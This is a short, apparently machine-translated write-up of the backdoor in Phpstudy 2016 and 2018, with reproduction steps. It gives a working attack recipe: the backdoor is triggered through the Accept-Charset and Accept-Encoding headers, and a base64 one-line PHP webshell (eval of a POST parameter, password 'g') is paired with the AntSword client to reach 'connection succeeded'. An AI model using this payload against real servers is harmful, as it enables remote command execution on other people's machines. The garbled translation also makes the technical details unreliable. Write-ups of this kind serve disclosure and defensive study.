0x01 Description
Phpstudy is a program integrated PHP debugging environment package, integrates the latest Apache, PHP, phpMyAdmin, ZendOptimizer variety of software and other one-time installation, no configuration out of the box. Due to its free and convenient features, in the country has nearly a million PHP language learners, developers user.
Backdoor Name: Phpstudy back door
Threat Level: Severe
Sphere of influence: Phpstudy 2016, phpstudy2018
Backdoor type: C & C, command execution
The use of difficulty: easy
0x02 reproducible
The use of tools: China ant sword
phpstudy:2016 PHP-5.4.45
Encoding-the Accept: gzip, the deflate
the Accept-Charset: command base64 encryption execution of
sentence Trojan: ZXZhbCgkX1BPU1RbZ10pOw ==
Password: g
Configuring HTTP message header
connection succeeded